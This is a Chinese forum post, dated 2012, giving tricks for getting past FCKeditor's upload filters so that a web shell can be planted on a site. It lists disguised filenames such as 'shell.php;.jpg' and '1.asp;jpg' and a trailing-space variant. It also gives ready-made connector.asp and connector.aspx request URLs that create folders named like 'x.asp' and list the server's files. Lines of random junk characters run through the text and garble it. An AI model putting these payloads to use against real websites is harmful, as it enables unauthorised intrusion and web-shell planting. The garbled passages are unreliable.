很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg
2 \2 N1 Y( k5 b" A, S8 Y$ O1 Y ^! ?4 v7 W. t
提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shell.php+空格 是 2 个不同的文件,未测试。1 N5 x4 |9 l* w) y! Q
5 E: o P+ U3 p继续上传同名文件可变为 shell.php;(1).jpg,也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。
/ @) m; ^3 O! \) i9 B; y7 _
1 G. k3 b+ A( o' d1 }突破建立文件夹:" R6 E9 y$ g \* M1 ?1 ~
" i7 ?! f5 f+ h" ]editor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp7 _. p1 F# Q2 M6 W) G w
{' f( o9 H" a4 ^1 [4 w5 s" q
参数:$ [8 v" W7 L" }" g
( C: u$ e% {: x; u7 I当前目录名:CurrentFolder=/qing.asp% r. H" p j$ \3 c3 ]
; V: I5 a& o4 @ Z# @; M3 D# v新的目录名:NewFolderName=x.asp
c( e% Q' _# e: O
9 |* g3 c$ Y" D5 Z其实很简单,在目录那里写 x.asp,然后点击新建目录在弹出来的对话框中随便写……+ j$ f! q& j$ c* R! B. r7 J
1 ]) ^! j( c+ r( \" h1 z0 {那么 x.asp 就已经建立生成了,此方法百试百灵!
( y* Z& [( A0 [9 ~
, t6 g1 J. C6 B# V1 q新建文件夹参数 x.asp,基本都能搞定。" P- P3 o- s* ]2 ?# e
7 ?" O/ v+ y* n4 G ]+ |
下面这句话是要在1.asp下建立2.asp,当不存在1.asp时会先创建,只过滤了目标目录的创建 而没有过滤不存在目录的创建) t4 f# |1 K& A9 j! R% F
2 \" K! V. X5 B6 m* R+ f2 @aspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2F1.asp&NewFolderName=2.asp
, O1 T( f; A" u% U& i( T# G( f
获取文件列表
" [; h: x* X2 {4 E* @ aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F2 \! ^- `% s3 |. l8 m; Z
/ K1 u9 a; U5 _* t1 p |
发表于 2012-12-31 09:27:09
收藏
分享
支持
反对